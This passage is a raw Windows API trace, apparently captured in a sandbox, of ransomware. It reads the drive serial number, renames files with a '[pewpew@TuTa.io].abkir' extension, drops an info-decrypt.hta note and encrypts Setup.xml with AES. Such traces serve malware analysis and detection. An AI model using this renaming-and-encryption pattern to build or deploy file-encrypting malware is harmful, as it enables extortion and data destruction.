WbemLocator:IUnknown:Release (This=0xb5b40c) returned 0x3 [0200.875] WbemLocator:IUnknown:Release (This=0xb5b424) returned 0x2 [0200.875] CoGetContextToken (in: pToken=0x6c0f0b8 | out: pToken=0x6c0f0b8) returned 0x0 [0200.875] CoGetContextToken (in: pToken=0x6c0f018 | out: pToken=0x6c0f018) returned 0x0 [0200.875] WbemLocator:IUnknown:QueryInterface (in: This=0xb5b424, riid=0x6c0f0e8*(Data1=0x9556dc99, Data2=0x828c, Data3=0x11cf, Data4=([0]=0xa3, [1]=0x7e, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x32, [6]=0x40, [7]=0xc7)), ppvObject=0x6c0f0e4 | out: ppvObject=0x6c0f0e4*=0x6033584) returned 0x0 [0200.875] WbemLocator:IUnknown:AddRef (This=0x6033584) returned 0x4 [0200.875] WbemLocator:IUnknown:Release (This=0x6033584) returned 0x3 [0200.875] WbemLocator:IUnknown:Release (This=0x6033584) returned 0x2 [0200.875] SysStringLen (param_1=0x0) returned 0x0 [0200.875] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6030b00, puCount=0x6c0f47c | out: puCount=0x6c0f47c*=0x0) returned 0x0 [0200.876] WbemDefPath:IWbemPath:GetText (in: This=0x6030b00, lFlags=2, puBuffLength=0x6c0f478*=0x0, pszText=0x0 | out: puBuffLength=0x6c0f478*=0x20, pszText=0x0) returned 0x0 [0200.876] WbemDefPath:IWbemPath:GetText (in: This=0x6030b00, lFlags=2, puBuffLength=0x6c0f478*=0x20, pszText="0000000000000000000000000000000" | out: puBuffLength=0x6c0f478*=0x20, pszText="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0200.876] CoGetContextToken (in: pToken=0x6c0f0e8 | out: pToken=0x6c0f0e8) returned 0x0 [0200.876] WbemLocator:IUnknown:AddRef (This=0xb5b424) returned 0x3 [0200.876] WbemLocator:IUnknown:QueryInterface (in: This=0xb5b424, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6c0ef7c | out: ppvObject=0x6c0ef7c*=0xb5b424) returned 0x0 [0200.876] WbemLocator:IUnknown:Release (This=0xb5b424) returned 0x3 [0200.876] WbemLocator:IUnknown:Release (This=0xb5b424) returned 0x2 [0200.876] WbemDefPath:IWbemPath:GetText (in: This=0x6030b00, lFlags=2, puBuffLength=0x6c0f480*=0x0, pszText=0x0 | out: puBuffLength=0x6c0f480*=0x20, pszText=0x0) returned 0x0 [0200.876] WbemDefPath:IWbemPath:GetText (in: This=0x6030b00, lFlags=2, puBuffLength=0x6c0f480*=0x20, pszText="0000000000000000000000000000000" | out: puBuffLength=0x6c0f480*=0x20, pszText="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0200.876] IWbemServices:GetObject (in: This=0x6033584, strObjectPath="win32_logicaldisk.deviceid=\"C:\"", lFlags=0, pCtx=0x0, ppObject=0x6c0f434*=0x0, ppCallResult=0x0 | out: ppObject=0x6c0f434*=0x6027b20, ppCallResult=0x0) returned 0x0 [0200.888] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x60305c0, puCount=0x6c0f434 | out: puCount=0x6c0f434*=0x2) returned 0x0 [0200.888] WbemDefPath:IWbemPath:GetText (in: This=0x60305c0, lFlags=4, puBuffLength=0x6c0f430*=0x0, pszText=0x0 | out: puBuffLength=0x6c0f430*=0xf, pszText=0x0) returned 0x0 [0200.888] WbemDefPath:IWbemPath:GetText (in: This=0x60305c0, lFlags=4, puBuffLength=0x6c0f430*=0xf, pszText="00000000000000" | out: puBuffLength=0x6c0f430*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0200.888] IWbemClassObject:Get (in: This=0x6027b20, wszName="VolumeSerialNumber", lFlags=0, pVal=0x6c0f430*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x367ff5c*=0, plFlavor=0x367ff60*=0 | out: pVal=0x6c0f430*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="9C354B42", varVal2=0x0), pType=0x367ff5c*=8, plFlavor=0x367ff60*=0) returned 0x0 [0200.888] SysStringByteLen (bstr="9C354B42") returned 0x10 [0200.888] SysStringByteLen (bstr="9C354B42") returned 0x10 [0200.888] IWbemClassObject:Get (in: This=0x6027b20, wszName="VolumeSerialNumber", lFlags=0, pVal=0x6c0f438*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x367ff5c*=8, plFlavor=0x367ff60*=0 | out: pVal=0x6c0f438*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="9C354B42", varVal2=0x0), pType=0x367ff5c*=8, plFlavor=0x367ff60*=0) returned 0x0 [0200.888] SysStringByteLen (bstr="9C354B42") returned 0x10 [0200.888] SysStringByteLen (bstr="9C354B42") returned 0x10 [0200.889] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PubLR.cab", nBufferLength=0x105, lpBuffer=0x6c0f038, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PubLR.cab", lpFilePart=0x0) returned 0x48 [0200.889] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PubLR.cab.id-9C354B42.[pewpew@TuTa.io].abkir", nBufferLength=0x105, lpBuffer=0x6c0f038, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PubLR.cab.id-9C354B42.[pewpew@TuTa.io].abkir", lpFilePart=0x0) returned 0x6b [0200.889] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6c0f498) returned 1 [0200.889] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PubLR.cab" (normalized: "c:\\msocache\\all users\\{90140000-0019-0409-1000-0000000ff1ce}-c\\publr.cab"), fInfoLevelId=0x0, lpFileInformation=0x6c0f514 | out: lpFileInformation=0x6c0f514*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x3cd17e00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x3cd17e00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0x316e5e00, ftLastWriteTime.dwHighDateTime=0x1d68bad, nFileSizeHigh=0x0, nFileSizeLow=0x20)) returned 1 [0200.889] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6c0f494) returned 1 [0200.889] MoveFileW (lpExistingFileName="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PubLR.cab" (normalized: "c:\\msocache\\all users\\{90140000-0019-0409-1000-0000000ff1ce}-c\\publr.cab"), lpNewFileName="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PubLR.cab.id-9C354B42.[pewpew@TuTa.io].abkir" (normalized: "c:\\msocache\\all users\\{90140000-0019-0409-1000-0000000ff1ce}-c\\publr.cab.id-9c354b42.[pewpew@tuta.io].abkir")) returned 1 [0200.890] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\Setup.xml", nBufferLength=0x105, lpBuffer=0x6c0f050, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\Setup.xml", lpFilePart=0x0) returned 0x48 [0200.890] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\info-decrypt.hta", nBufferLength=0x105, lpBuffer=0x6c0f058, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\info-decrypt.hta", lpFilePart=0x0) returned 0x4f [0200.890] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6c0f4b8) returned 1 [0200.890] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\info-decrypt.hta" (normalized: "c:\\msocache\\all users\\{90140000-0019-0409-1000-0000000ff1ce}-c\\info-decrypt.hta"), fInfoLevelId=0x0, lpFileInformation=0x6c0f534 | out: lpFileInformation=0x6c0f534*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x2e3b8500, ftCreationTime.dwHighDateTime=0x1d68bad, ftLastAccessTime.dwLowDateTime=0x2e3b8500, ftLastAccessTime.dwHighDateTime=0x1d68bad, ftLastWriteTime.dwLowDateTime=0x2e3b8500, ftLastWriteTime.dwHighDateTime=0x1d68bad, nFileSizeHigh=0x0, nFileSizeLow=0x155e)) returned 1 [0200.890] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6c0f4b4) returned 1 [0200.890] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\Setup.xml", nBufferLength=0x105, lpBuffer=0x6c0f058, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\Setup.xml", lpFilePart=0x0) returned 0x48 [0200.890] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6c0f504) returned 1 [0200.890] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-0019-0409-1000-0000000ff1ce}-c\\setup.xml"), fInfoLevelId=0x0, lpFileInformation=0x36805d0 | out: lpFileInformation=0x36805d0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x43f88c00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x43f88c00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xfc8a9170, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x648)) returned 1 [0200.890] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6c0f500) returned 1 [0200.890] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\Setup.xml", nBufferLength=0x105, lpBuffer=0x6c0ef44, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\Setup.xml", lpFilePart=0x0) returned 0x48 [0200.890] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6c0f438) returned 1 [0200.890] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-0019-0409-1000-0000000ff1ce}-c\\setup.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x31c [0200.890] GetFileType (hFile=0x31c) returned 0x1 [0200.890] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6c0f434) returned 1 [0200.891] GetFileType (hFile=0x31c) returned 0x1 [0200.891] GetFileSize (in: hFile=0x31c, lpFileSizeHigh=0x6c0f540 | out: lpFileSizeHigh=0x6c0f540*=0x0) returned 0x648 [0200.891] ReadFile (in: hFile=0x31c, lpBuffer=0x3680e34, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x6c0f4ec, lpOverlapped=0x0 | out: lpBuffer=0x3680e34*, lpNumberOfBytesRead=0x6c0f4ec*=0x648, lpOverlapped=0x0) returned 1 [0201.242] CloseHandle (hObject=0x31c) returned 1 [0201.242] CryptAcquireContextW (in: phProv=0x6c0f48c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x6c0f48c*=0xbdf9d0) returned 1 [0201.243] CryptGenRandom (in: hProv=0xbdf9d0, dwLen=0x10, pbBuffer=0x3682188 | out: pbBuffer=0x3682188) returned 1 [0201.611] CryptImportKey (in: hProv=0xbdf9d0, pbData=0x3743d30, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x6c0f45c | out: phKey=0x6c0f45c*=0xb7f010) returned 1 [0201.611] CryptContextAddRef (hProv=0xbdf9d0, pdwReserved=0x0, dwFlags=0x0) returned 1 [0201.611] CryptContextAddRef (hProv=0xbdf9d0, pdwReserved=0x0, dwFlags=0x0) returned 1 [0201.611] CryptDuplicateKey (in: hKey=0xb7f010, pdwReserved=0x0, dwFlags=0x0, phKey=0x6c0f44c | out: phKey=0x6c0f44c*=0xb7fc50) returned 1 [0201.612] CryptContextAddRef (hProv=0xbdf9d0, pdwReserved=0x0, dwFlags=0x0) returned 1 [0201.612] CryptSetKeyParam (hKey=0xb7fc50, dwParam=0x4, pbData=0x3743e10*=0x1, dwFlags=0x0) returned 1 [0201.612] CryptSetKeyParam (hKey=0xb7fc50, dwParam=0x1, pbData=0x3743ddc, dwFlags=0x0) returned 1 [0201.612] CryptEncrypt (in: hKey=0xb7fc50, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3743e20*, pdwDataLen=0x6c0f4b8*=0x650, dwBufLen=0x650 | out: pbData=0x3743e20*, pdwDataLen=0x6c0f4b8*=0x650) returned 1 [0201.612] CryptEncrypt (in: hKey=0xb7fc50, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x3744494*, pdwDataLen=0x6c0f4c0*=0x0, dwBufLen=0x10 | out: pbData=0x3744494*, pdwDataLen=0x6c0f4c0*=0x10) returned 1 [0201.613] CryptDestroyKey (hKey=0xb7f010) returned 1 [0201.613] CryptReleaseContext (hProv=0xbdf9d0, dwFlags=0x0) returned 1 [0201.613] CryptReleaseContext (hProv=0xbdf9d0, dwFlags=0x0) returned 1 [0201.613] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\Setup.xml", nBufferLength=0x105, lpBuffer=0x6c0ef30, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\Setup.xml", lpFilePart=0x0) returned 0x48 [0201.613] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6c0f424) returned 1 [0201.613] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-0019-0409-1000-0000000ff1ce}-c\\setup.xml"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x4e0 [0201.615] GetFileType (hFile=0x4e0) returned 0x1 [0201.615] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6c0f420) returned 1 [0201.615] GetFileType (hFile=0x4e0) returned 0x1 [0201.615] WriteFile (in: hFile=0x4e0, lpBuffer=0x3744ab8*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x6c0f4b4, lpOverlapped=0x0 | out: lpBuffer=0x3744ab8*, lpNumberOfBytesWritten=0x6c0f4b4*=0x20, lpOverlapped=0x0) returned 1 [0201.617] CloseHandle (hObject=0x4e0) returned 1 [0201.617] CoTaskMemAlloc (cb=0x20c) returned 0xbed438 [0201.617] SHGetFolderPathW (in: hwnd=0x0, csidl=37, hToken=0x0, dwFlags=0x0, pszPath=0xbed438 | out: pszPath="C:\\Windows\\system32") returned 0x0 [0201.618] CoTaskMemFree (pv=0xbed438) [0201.618] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x6c0ef18, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0201.618] CoGetObjectContext (in: riid=0x34d7b34*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x6c0f460 | out: ppv=0x6c0f460*=0xb51e34) returned 0x0 [0201.618] IComThreadingInfo:GetCurrentApartmentType (in: This=0xb51e34, pAptType=0x6c0f458 | out: pAptType=0x6c0f458*=1) returned 0x0 [0201.618] IUnknown:QueryInterface (in: This=0xb51e34, riid=0x34d7b1c*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x6c0f45c | out: ppvObject=0x6c0f45c*=0x0) returned 0x80004002 [0201.618] IUnknown:Release (This=0xb51e34) returned 0x1 [0201.619] CoGetClassObject (in: rclsid=0xb594e4*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x74aad1fc*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x6c0edc8 | out: ppv=0x6c0edc8*=0x6027590) returned 0x0 [0201.619] WbemDefPath:IUnknown:QueryInterface (in: This=0x6027590, riid=0x74ae0ae0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x6c0efe0 | out: ppvObject=0x6c0efe0*=0x0) returned 0x80004002 [0201.619] WbemDefPath:IClassFactory:CreateInstance (in: This=0x6027590, pUnkOuter=0x0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6c0eff4 | out: ppvObject=0x6c0eff4*=0x6029e30) returned 0x0 [0201.619] WbemDefPath:IUnknown:Release (This=0x6027590) returned 0x0 [0201.619] WbemDefPath:IUnknown:QueryInterface (in: This=0x6029e30, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6c0ec14 | out: ppvObject=0x6c0ec14*=0x6029e30) returned 0x0 [0201.619] WbemDefPath:IUnknown:QueryInterface (in: This=0x6029e30, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x6c0ebd0 | out: ppvObject=0x6c0ebd0*=0x0) returned 0x80004002 [0201.619] WbemDefPath:IUnknown:AddRef (This=0x6029e30) returned 0x3 [0201.619] WbemDefPath:IUnknown:QueryInterface (in: This=0x6029e30, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x6c0e52c | out: ppvObject=0x6c0e52c*=0x0) returned 0x80004002 [0201.619] WbemDefPath:IUnknown:QueryInterface (in: This=0x6029e30, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x6c0e4dc | out: ppvObject=0x6c0e4dc*=0x0) returned 0x80004002 [0201.619] WbemDefPath:IUnknown:QueryInterface (in: This=0x6029e30, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6c0e4e8 | out: ppvObject=0x6c0e4e8*=0xbb5858) returned 0x0 [0201.619] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0xbb5858, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x6c0e4f0 | out: pCid=0x6c0e4f0*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0201.619] WbemDefPath:IUnknown:Release (This=0xbb5858) returned 0x3 [0201.619] CoGetContextToken (in: pToken=0x6c0e548 | out: pToken=0x6c0e548) returned 0x0 [0201.620] CoGetContextToken (in: pToken=0x6c0e4f8 | out: pToken=0x6c0e4f8) returned 0x0 [0201.620] CoGetContextToken (in: pToken=0x6c0e950 | out: pToken=0x6c0e950) returned 0x0 [0201.620] WbemDefPath:IUnknown:QueryInterface (in: This=0x6029e30, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6c0e9e0 | out: ppvObject=0x6c0e9e0*=0x0) returned 0x80004002 [0201.620] WbemDefPath:IUnknown:Release (This=0x6029e30) returned 0x2 [0201.620] WbemDefPath:IUnknown:Release (This=0x6029e30) returned 0x1 [0201.620] CoGetContextToken (in: pToken=0x6c0f2d8 | out: pToken=0x6c0f2d8) returned 0x0 [0201.620] CoGetContextToken (in: pToken=0x6c0f238 | out: pToken=0x6c0f238) returned 0x0 [0201.620] WbemDefPath:IUnknown:QueryInterface (in: This=0x6029e30, riid=0x6c0f308*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x6c0f304 | out: ppvObject=0x6c0f304*=0x6029e30) returned 0x0 [0201.620] WbemDefPath:IUnknown:AddRef (This=0x6029e30) returned 0x3 [0201.620] WbemDefPath:IUnknown:Release (This=0x6029e30) returned 0x2 [0201.620] WbemDefPath:IWbemPath:SetText (This=0x6029e30, uMode=0x4, pszPath="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0201.620] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6029e30, puCount=0x6c0f48c | out: puCount=0x6c0f48c*=0x0) returned 0x0 [0201.620] WbemDefPath:IWbemPath:GetText (in: This=0x6029e30, lFlags=2, puBuffLength=0x6c0f488*=0x0, pszText=0x0 | out: puBuffLength=0x6c0f488*=0x20, pszText=0x0) returned 0x0 [0201.620] WbemDefPath:IWbemPath:GetText (in: This=0x6029e30, lFlags=2, puBuffLength=0x6c0f488*=0x20, pszText="0000000000000000000000000000000" | out: puBuffLength=0x6c0f488*=0x20, pszText="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0201.620] WbemDefPath:IWbemPath:GetInfo (in: This=0x6029e30, uRequestedInfo=0x0, puResponse=0x6c0f494 | out: puResponse=0x6c0f494*=0xc19) returned 0x0 [0201.620] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6029e30, puCount=0x6c0f48c | out: puCount=0x6c0f48c*=0x0) returned 0x0 [0201.620] WbemDefPath:IWbemPath:GetInfo (in: This=0x6029e30, uRequestedInfo=0x0, puResponse=0x6c0f494 | out: puResponse=0x6c0f494*=0xc19) returned 0x0 [0201.620] WbemDefPath:IWbemPath:GetInfo (in: This=0x6029e30, uRequestedInfo=0x0, puResponse=0x6c0f494 | out: puResponse=0x6c0f494*=0xc19) returned 0x0 [0201.620] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6029e30, puCount=0x6c0f40c | out: puCount=0x6c0f40c*=0x0) returned 0x0 [0201.620] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x60109c0, puCount=0x6c0f3f8 | out: puCount=0x6c0f3f8*=0x2) returned 0x0 [0201.620] WbemDefPath:IWbemPath:GetText (in: This=0x60109c0, lFlags=4, puBuffLength=0x6c0f3f4*=0x0, pszText=0x0 | out: puBuffLength=0x6c0f3f4*=0xf, pszText=0x0) returned 0x0 [0201.620] WbemDefPath:IWbemPath:GetText (in: This=0x60109c0, lFlags=4, puBuffLength=0x6c0f3f4*=0xf, pszText="00000000000000" | out: puBuffLength=0x6c0f3f4*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0201.620] CoGetObjectContext (in: riid=0x34d7b34*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x6c0f3a8 | out: ppv=0x6c0f3a8*=0xb51e34) returned 0x0 [0201.620] IComThreadingInfo:GetCurrentApartmentType (in: This=0xb51e34, pAptType=0x6c0f3a0 | out: pAptType=0x6c0f3a0*=1) returned 0x0 [0201.620] IUnknown:QueryInterface (in: This=0xb51e34, riid=0x34d7b1c*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x6c0f3a4 | out: ppvObject=0x6c0f3a4*=0x0) returned 0x80004002 [0201.620] IUnknown:Release (This=0xb51e34) returned 0x1 [0201.621] CoGetClassObject (in: rclsid=0xb594e4*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x74aad1fc*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x6c0ed10 | out: ppv=0x6c0ed10*=0x6027650) returned 0x0 [0201.621] WbemDefPath:IUnknown:QueryInterface (in: This=0x6027650, riid=0x74ae0ae0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x6c0ef28 | out: ppvObject=0x6c0ef28*=0x0) returned 0x80004002 [0201.621] WbemDefPath:IClassFactory:CreateInstance (in: This=0x6027650, pUnkOuter=0x0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6c0ef3c | out: ppvObject=0x6c0ef3c*=0x6029ea0) returned 0x0 [0201.621] WbemDefPath:IUnknown:Release (This=0x6027650) returned 0x0 [0201.621] WbemDefPath:IUnknown:QueryInterface (in: This=0x6029ea0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6c0eb5c | out: ppvObject=0x6c0eb5c*=0x6029ea0) returned 0x0 [0201.621] WbemDefPath:IUnknown:QueryInterface (in: This=0x6029ea0, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x6c0eb18 | out: ppvObject=0x6c0eb18*=0x0) returned 0x80004002 [0201.621] WbemDefPath:IUnknown:AddRef (This=0x6029ea0) returned 0x3 [0201.621] WbemDefPath:IUnknown:QueryInterface (in: This=0x6029ea0, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x6c0e474 | out: ppvObject=0x6c0e474*=0x0) returned 0x80004002 [0201.621] WbemDefPath:IUnknown:QueryInterface (in: This=0x6029ea0, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x6c0e424 | out: ppvObject=0x6c0e424*=0x0) returned 0x80004002 [0201.622] WbemDefPath:IUnknown:QueryInterface (in: This=0x6029ea0, riid=0x74b3c350*(Data1=0x3, 